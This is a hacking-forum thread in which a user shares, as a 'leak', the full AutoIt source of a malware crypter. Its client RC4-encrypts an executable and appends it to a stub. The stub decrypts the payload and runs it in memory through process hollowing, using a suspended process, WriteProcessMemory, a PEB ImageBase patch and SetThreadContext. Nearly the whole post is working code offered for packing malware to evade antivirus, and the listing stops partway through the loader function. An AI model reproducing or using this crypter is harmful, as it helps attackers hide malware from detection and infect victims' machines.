1. Все файлы исключительно загружать на наш сервер в формате .rar или .zip, темы где будут указаны ссылки для загрузки файлов будут удалены.

autoit crypter source 5/59

Тема в разделе "Autoit", создана пользователем rivaldo, 16 ноя 2015.

  1. rivaldo
    Статус
    Оффлайн
    Сообщения:
    101
    Симпатии:
    75
    greetings,

    i am a new forum member and i want to contibrute as much as possible ;)

    my first leak:
    crypter client source:

    Код:
    #AutoIt3Wrapper_Run_Obfuscator=Y
    #Obfuscator_Parameters=/SF /SV /OM /CS=0 /CN=0
    #NoTrayIcon
    #include <ButtonConstants.au3>
    #include <EditConstants.au3>
    #include <GUIConstantsEx.au3>
    #include <StaticConstants.au3>
    #include <WindowsConstants.au3>
    
    $MainForm = GUICreate("Riet crypter", 515, 78, -1, -1)
    $pFileSelectBtn = GUICtrlCreateButton("...", 472, 8, 35, 21)
    $pCryptFileBtn = GUICtrlCreateButton("Crypt", 8, 40, 497, 25)
    $pPathInput = GUICtrlCreateInput("", 8, 8, 457, 21)
    GUISetState(@SW_SHOW)
    
    Func RC4($Data, $Key)
        Local $Opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
        Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
        DllStructSetData($CodeBuffer, 1, $Opcode)
        Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
        DllStructSetData($Buffer, 1, $Data)
        DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
        Local $Ret = DllStructGetData($Buffer, 1)
        $Buffer = 0
        $CodeBuffer = 0
        Return $Ret
    EndFunc   ;==>RC4
    
    While 1
        $nMsg = GUIGetMsg()
        Switch $nMsg
            Case $GUI_EVENT_CLOSE
                Exit
    
            Case $pFileSelectBtn
                GUICtrlSetData($pPathInput, FileOpenDialog("Open file...", @ScriptDir, "Applications (*.exe)"))
    
            Case $pCryptFileBtn
                If GUICtrlRead($pPathInput) = "" Then ;If file not selected then:
                    MsgBox(16, "Error", "Select file first!") ;Showing MessageBox with flag 16 (error)
                    ContinueCase ;And continue case
                EndIf
    
                GuiCtrlSetState($pCryptFileBtn, $GUI_DISABLE) ;Temporary disabling buttons
                GuiCtrlSetState($pFileSelectBtn, $GUI_DISABLE)
    
                $hStub = FileOpen(@ScriptDir & "\Stub.exe", 16) ;Opening stub file in binary mode (flag 16)
                $hFile = FileOpen(GUICtrlRead($pPathInput), 16) ;Opening file to crypt in binary mode too
    
                $sStubData = FileRead($hStub) ;Reading stub and file
                $sFileData = FileRead($hFile)
    
                $sEncryptedFileData = RC4($sFileData, "aaa") ;Encrypting file with using RC4 alg. with key "KeyHere_ChangeIt"
    
                $sResult = FileOpen(FileSaveDialog("Save file as...", @ScriptDir, "Applications (*.exe)"), 18)
    
                FileWrite($sResult, $sStubData) ;Writing stub data
                FileWrite($sResult, StringToBinary("-=L23=-")) ;Inserting binary separator "-=L23=-"
                FileWrite($sResult, $sEncryptedFileData) ;Writing encrypted file data
    
                ; As result file strutcture will be like:
    
                ;===========[Stub data]============;
                ;========[Binary separator]========;
                ;======[Encrypted file data]=======;
    
                FileClose($hStub) ;Close the all handles returned by FileOpen (stub, file, result)
                FileClose($hFile)
                FileClose($sResult)
    
                GuiCtrlSetState($pCryptFileBtn, $GUI_ENABLE) ;Enabling buttons
                GuiCtrlSetState($pFileSelectBtn, $GUI_ENABLE)
    
                MsgBox(64, "Crypter template [L23 - DDoSer]", "Done!") ;Showing final message
        EndSwitch
    WEnd
    stub source:

    Код:
    #Region compile options
    #pragma compile(inputboxres, false) ;Removing inputbox resource form result
    #pragma compile(AutoItExecuteAllowed, false) ;Disabling AutoItExecute function
    #pragma compile(x64, false) ;Compile for x86 systems
    ;#pragma compile(ExecLevel, highestavailable) ;Setting the execution level in the compiled executable manifest (also, u can use this: none, asInvoker, highestAvailable, requireAdministrator)
    #EndRegion
    #NoTrayIcon
    
    
    $sEncryptedData = FileRead(FileOpen(@AutoitExe)) ;Opening itself
    $sSeparatedData = StringMid($sEncryptedData, StringInStr($sEncryptedData, "-=L23=-") + StringLen("-=L23=-")) ;Separating stub data and encrypted data
    $sDecryptedData = RC4($sSeparatedData, "aaa") ;Decrypting data with key "KeyHere_ChangeIt"
    
    _RunBinary(Binary($sDecryptedData)) ;Syntax is: _RunBinary($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe)
    
    Func RC4($Data, $Key)
        Local $Opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
        Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
        DllStructSetData($CodeBuffer, 1, $Opcode)
        Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
        DllStructSetData($Buffer, 1, $Data)
        DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
        Local $Ret = DllStructGetData($Buffer, 1)
        $Buffer = 0
        $CodeBuffer = 0
        Return $Ret
    EndFunc   ;==>RC4
    
    Func _RunBinary($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe)
        ;#region 1. DETERMINE INTERPRETER TYPE
        Local $fAutoItX64 = @AutoItX64
    
        ;#region 2. PREDPROCESSING PASSED
        Local $bBinary = Binary($bBinaryImage) ; this is redundant but still...
        ; Make structure out of binary data that was passed
        Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]")
        DllStructSetData($tBinary, 1, $bBinary) ; fill it
        ; Get pointer to it
        Local $pPointer = DllStructGetPtr($tBinary)
    
        ;#region 3. CREATING NEW PROCESS
        ; STARTUPINFO structure (actually all that really matters is allocated space)
        Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _
                "ptr Reserved;" & _
                "ptr Desktop;" & _
                "ptr Title;" & _
                "dword X;" & _
                "dword Y;" & _
                "dword XSize;" & _
                "dword YSize;" & _
                "dword XCountChars;" & _
                "dword YCountChars;" & _
                "dword FillAttribute;" & _
                "dword Flags;" & _
                "word ShowWindow;" & _
                "word Reserved2;" & _
                "ptr Reserved2;" & _
                "ptr hStdInput;" & _
                "ptr hStdOutput;" & _
                "ptr hStdError")
        ; This is much important. This structure will hold very some important data.
        Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _
                "ptr Thread;" & _
                "dword ProcessId;" & _
                "dword ThreadId")
        ; Create new process
        Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _
                "wstr", $sExeModule, _
                "wstr", $sCommandLine, _
                "ptr", 0, _
                "ptr", 0, _
                "int", 0, _
                "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential
                "ptr", 0, _
                "ptr", 0, _
                "ptr", DllStructGetPtr($tSTARTUPINFO), _
                "ptr", DllStructGetPtr($tPROCESS_INFORMATION))
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
        ; Get new process and thread handles:
        Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")
        Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")
        ; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
        If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(2, 0, 0)
        EndIf
    
        ;#region 4. FILL CONTEXT STRUCTURE
        ; CONTEXT structure is what's really important here. It's processor specific.
        Local $iRunFlag, $tCONTEXT
        If $fAutoItX64 Then
            If @OSArch = "X64" Then
                $iRunFlag = 2
                $tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses
                        "dword ContextFlags; dword MxCsr;" & _ ; Control flags
                        "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags
                        "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers
                        "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers
                        "uint64 Rip;" & _ ; Program counter
                        "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!)
                        "uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
                        "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers
            Else
                $iRunFlag = 3
                ; FIXME - Itanium architecture
                ; Return special error number:
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(102, 0, 0)
            EndIf
        Else
            $iRunFlag = 1
            $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags
                    "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS
                    "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT
                    "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS
                    "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER
                    "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL
                    "byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS
        EndIf
        ; Define CONTEXT_FULL
        Local $CONTEXT_FULL
        Switch $iRunFlag
            Case 1
                $CONTEXT_FULL = 0x10007
            Case 2
                $CONTEXT_FULL = 0x100007
            Case 3
                $CONTEXT_FULL = 0x80027
        EndSwitch
        ; Set desired access
        DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)
        ; Fill CONTEXT structure:
        $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _
                "handle", $hThread, _
                "ptr", DllStructGetPtr($tCONTEXT))
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
        EndIf
        ; Pointer to PEB structure
        Local $pPEB
        Switch $iRunFlag
            Case 1
                $pPEB = DllStructGetData($tCONTEXT, "Ebx")
            Case 2
                $pPEB = DllStructGetData($tCONTEXT, "Rdx")
            Case 3
                ; FIXME - Itanium architecture
        EndSwitch
    
        ;#region 5. READ PE-FORMAT
        ; Start processing passed binary data. 'Reading' PE format follows.
        ; First is IMAGE_DOS_HEADER
        Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _
                "word BytesOnLastPage;" & _
                "word Pages;" & _
                "word Relocations;" & _
                "word SizeofHeader;" & _
                "word MinimumExtra;" & _
                "word MaximumExtra;" & _
                "word SS;" & _
                "word SP;" & _
                "word Checksum;" & _
                "word IP;" & _
                "word CS;" & _
                "word Relocation;" & _
                "word Overlay;" & _
                "char Reserved[8];" & _
                "word OEMIdentifier;" & _
                "word OEMInformation;" & _
                "char Reserved2[20];" & _
                "dword AddressOfNewExeHeader", _
                $pPointer)
        ; Save this pointer value (it's starting address of binary image headers)
        Local $pHEADERS_NEW = $pPointer
        ; Move pointer
        $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header
        ; Get "Magic"
        Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")
        ; Check if it's valid format
        If Not ($sMagic == "MZ") Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(4, 0, 0) ; MS-DOS header missing.
        EndIf
        ; In place of IMAGE_NT_SIGNATURE
        Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)
        ; Move pointer
        $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure
        ; Check signature
        If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.
        EndIf
        ; In place of IMAGE_FILE_HEADER
        Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _
                "word NumberOfSections;" & _
                "dword TimeDateStamp;" & _
                "dword PointerToSymbolTable;" & _
                "dword NumberOfSymbols;" & _
                "word SizeOfOptionalHeader;" & _
                "word Characteristics", _
                $pPointer)
        ; I could check here if the module is relocatable
        ; Local $fRelocatable
        ; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False
        ; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
        ; Get number of sections
        Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")
        ; Move pointer
        $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure
        ; In place of IMAGE_OPTIONAL_HEADER
        Local $tMagic = DllStructCreate("word Magic;", $pPointer)
        Local $iMagic = DllStructGetData($tMagic, 1)
        Local $tIMAGE_OPTIONAL_HEADER
        If $iMagic = 267 Then ; x86 version
            If $fAutoItX64 Then
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(6, 0, 0) ; incompatible versions
            EndIf
            $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
                    "byte MajorLinkerVersion;" & _
                    "byte MinorLinkerVersion;" & _
                    "dword SizeOfCode;" & _
                    "dword SizeOfInitializedData;" & _
                    "dword SizeOfUninitializedData;" & _
                    "dword AddressOfEntryPoint;" & _
                    "dword BaseOfCode;" & _
                    "dword BaseOfData;" & _
                    "dword ImageBase;" & _
                    "dword SectionAlignment;" & _
                    "dword FileAlignment;" & _
                    "word MajorOperatingSystemVersion;" & _
                    "word MinorOperatingSystemVersion;" & _
                    "word MajorImageVersion;" & _
                    "word MinorImageVersion;" & _
                    "word MajorSubsystemVersion;" & _
                    "word MinorSubsystemVersion;" & _
                    "dword Win32VersionValue;" & _
                    "dword SizeOfImage;" & _
                    "dword SizeOfHeaders;" & _
                    "dword CheckSum;" & _
                    "word Subsystem;" & _
                    "word DllCharacteristics;" & _
                    "dword SizeOfStackReserve;" & _
                    "dword SizeOfStackCommit;" & _
                    "dword SizeOfHeapReserve;" & _
                    "dword SizeOfHeapCommit;" & _
                    "dword LoaderFlags;" & _
                    "dword NumberOfRvaAndSizes", _
                    $pPointer)
            ; Move pointer
            $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER
        ElseIf $iMagic = 523 Then ; x64 version
            If Not $fAutoItX64 Then
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(6, 0, 0) ; incompatible versions
            EndIf
            $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
                    "byte MajorLinkerVersion;" & _
                    "byte MinorLinkerVersion;" & _
                    "dword SizeOfCode;" & _
                    "dword SizeOfInitializedData;" & _
                    "dword SizeOfUninitializedData;" & _
                    "dword AddressOfEntryPoint;" & _
                    "dword BaseOfCode;" & _
                    "uint64 ImageBase;" & _
                    "dword SectionAlignment;" & _
                    "dword FileAlignment;" & _
                    "word MajorOperatingSystemVersion;" & _
                    "word MinorOperatingSystemVersion;" & _
                    "word MajorImageVersion;" & _
                    "word MinorImageVersion;" & _
                    "word MajorSubsystemVersion;" & _
                    "word MinorSubsystemVersion;" & _
                    "dword Win32VersionValue;" & _
                    "dword SizeOfImage;" & _
                    "dword SizeOfHeaders;" & _
                    "dword CheckSum;" & _
                    "word Subsystem;" & _
                    "word DllCharacteristics;" & _
                    "uint64 SizeOfStackReserve;" & _
                    "uint64 SizeOfStackCommit;" & _
                    "uint64 SizeOfHeapReserve;" & _
                    "uint64 SizeOfHeapCommit;" & _
                    "dword LoaderFlags;" & _
                    "dword NumberOfRvaAndSizes", _
                    $pPointer)
            ; Move pointer
            $pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER
        Else
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(6, 0, 0) ; incompatible versions
        EndIf
        ; Extract entry point address
        Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address
        ; And other interesting informations
        Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
        Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory
        Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers
        ; Move pointer
        $pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
        $pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT
        $pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
        ; Base Relocation Directory
        Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer)
        ; Collect data
        Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress")
        Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size")
        Local $fRelocatable
        If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True
        ;If Not $fRelocatable Then MsgBox(48, "Warning!", "NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!") ; nothing can be done here
        ; Move pointer
        $pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
    
        ;#region 6. ALLOCATE 'NEW' MEMORY SPACE
        Local $fRelocate
        Local $pZeroPoint
        If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible
            $pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW)
            ; In case of failure try at original address
            If @error Then
                $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                If @error Then
                    _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
                    ; Try now
                    $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                    If @error Then
                        ; Return special error number:
                        DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                        Return SetError(101, 1, 0)
                    EndIf
                EndIf
            EndIf
            $fRelocate = True
        Else ; And if not try where it should be
            $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
            If @error Then
                _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
                ; Try now
                $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                If @error Then
                    ; Return special error number:
                    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                    Return SetError(101, 0, 0)
                EndIf
            EndIf
        EndIf
        ; If there is new ImageBase value, save it
        DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint)
    
        ;#region 7. CONSTRUCT THE NEW MODULE
        ; Allocate enough space (in our space) for the new module
        Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]")
        ; Get pointer
        Local $pModule = DllStructGetPtr($tModule)
        ; Headers
        Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW)
        ; Write headers to $tModule
        DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1))
        ; Write sections now. $pPointer is currently in place of sections
        Local $tIMAGE_SECTION_HEADER
        Local $iSizeOfRawData, $pPointerToRawData
        Local $iVirtualAddress, $iVirtualSize
        Local $tRelocRaw
        ; Loop through sections
        For $i = 1 To $iNumberOfSections
            $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _
                    "dword UnionOfVirtualSizeAndPhysicalAddress;" & _
                    "dword VirtualAddress;" & _
                    "dword SizeOfRawData;" & _
                    "dword PointerToRawData;" & _
                    "dword PointerToRelocations;" & _
                    "dword PointerToLinenumbers;" & _
                    "word NumberOfRelocations;" & _
                    "word NumberOfLinenumbers;" & _
                    "dword Characteristics", _
                    $pPointer)
            ; Collect data
            $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
            $pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
            $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")
            $iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress")
            If $iVirtualSize And $iVirtualSize < $iSizeOfRawData Then $iSizeOfRawData = $iVirtualSize
            ; If there is data to write, write it
            If $iSizeOfRawData Then
                DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1))
            EndIf
            ; Relocations
            If $fRelocate Then
                If $iVirtualAddress <= $pAddressNewBaseReloc And $iVirtualAddress + $iSizeOfRawData > $pAddressNewBaseReloc Then
                    $tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress))
                EndIf
            EndIf
            ; Move pointer
            $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
        Next
        ; Fix relocations
        If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523)
        ; Write newly constructed module to allocated space inside the $hProcess
        $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", _
                "handle", $hProcess, _
                "ptr", $pZeroPoint, _
                "ptr", $pModule, _
                "dword_ptr", $iOptionalHeaderSizeOfImageNEW, _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(7, 0, 0) ; WriteProcessMemory function or call to it while writting new module binary
        EndIf
    
        ;#region 8. PEB ImageBaseAddress MANIPULATION
        ; PEB structure definition
        Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _
                "byte ReadImageFileExecOptions;" & _
                "byte BeingDebugged;" & _
                "byte Spare;" & _
                "ptr Mutant;" & _
                "ptr ImageBaseAddress;" & _
                "ptr LoaderData;" & _
                "ptr ProcessParameters;" & _
                "ptr SubSystemData;" & _
                "ptr ProcessHeap;" & _
                "ptr FastPebLock;" & _
                "ptr FastPebLockRoutine;" & _
                "ptr FastPebUnlockRoutine;" & _
                "dword EnvironmentUpdateCount;" & _
                "ptr KernelCallbackTable;" & _
                "ptr EventLogSection;" & _
                "ptr EventLog;" & _
                "ptr FreeList;" & _
                "dword TlsExpansionCounter;" & _
                "ptr TlsBitmap;" & _
                "dword TlsBitmapBits[2];" & _
                "ptr ReadOnlySharedMemoryBase;" & _
                "ptr ReadOnlySharedMemoryHeap;" & _
                "ptr ReadOnlyStaticServerData;" & _
                "ptr AnsiCodePageData;" & _
                "ptr OemCodePageData;" & _
                "ptr UnicodeCaseTableData;" & _
                "dword NumberOfProcessors;" & _
                "dword NtGlobalFlag;" & _
                "byte Spare2[4];" & _
                "int64 CriticalSectionTimeout;" & _
                "dword HeapSegmentReserve;" & _
                "dword HeapSegmentCommit;" & _
                "dword HeapDeCommitTotalFreeThreshold;" & _
                "dword HeapDeCommitFreeBlockThreshold;" & _
                "dword NumberOfHeaps;" & _
                "dword MaximumNumberOfHeaps;" & _
                "ptr ProcessHeaps;" & _
                "ptr GdiSharedHandleTable;" & _
                "ptr ProcessStarterHelper;" & _
                "ptr GdiDCAttributeList;" & _
                "ptr LoaderLock;" & _
                "dword OSMajorVersion;" & _
                "dword OSMinorVersion;" & _
                "dword OSBuildNumber;" & _
                "dword OSPlatformId;" & _
                "dword ImageSubSystem;" & _
                "dword ImageSubSystemMajorVersion;" & _
                "dword ImageSubSystemMinorVersion;" & _
                "dword GdiHandleBuffer[34];" & _
                "dword PostProcessInitRoutine;" & _
                "dword TlsExpansionBitmap;" & _
                "byte TlsExpansionBitmapBits[128];" & _
                "dword SessionId")
        ; Fill the structure
        $aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _
                "ptr", $hProcess, _
                "ptr", $pPEB, _ ; pointer to PEB structure
                "ptr", DllStructGetPtr($tPEB), _
                "dword_ptr", DllStructGetSize($tPEB), _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
        EndIf
        ; Change base address within PEB
        DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint)
        ; Write the changes
        $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", _
                "handle", $hProcess, _
                "ptr", $pPEB, _
                "ptr", DllStructGetPtr($tPEB), _
                "dword_ptr", DllStructGetSize($tPEB), _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(9, 0, 0) ; WriteProcessMemory function or call to it failed while changing base address
        EndIf
    
        ;#region 9. NEW ENTRY POINT
        ; Entry point manipulation
        Switch $iRunFlag
            Case 1
                DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW)
            Case 2
                DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW)
            Case 3
                ; FIXME - Itanium architecture
        EndSwitch
    
        ;#region 10. SET NEW CONTEXT
        ; New context:
        $aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _
                "handle", $hThread, _
                "ptr", DllStructGetPtr($tCONTEXT))
    
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
        EndIf
    
        ;#region 11. RESUME THREAD
        ; And that's it!. Continue execution:
        $aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
        ; Check for errors or failure
        If @error Or $aCall[0] = -1 Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
        EndIf
    
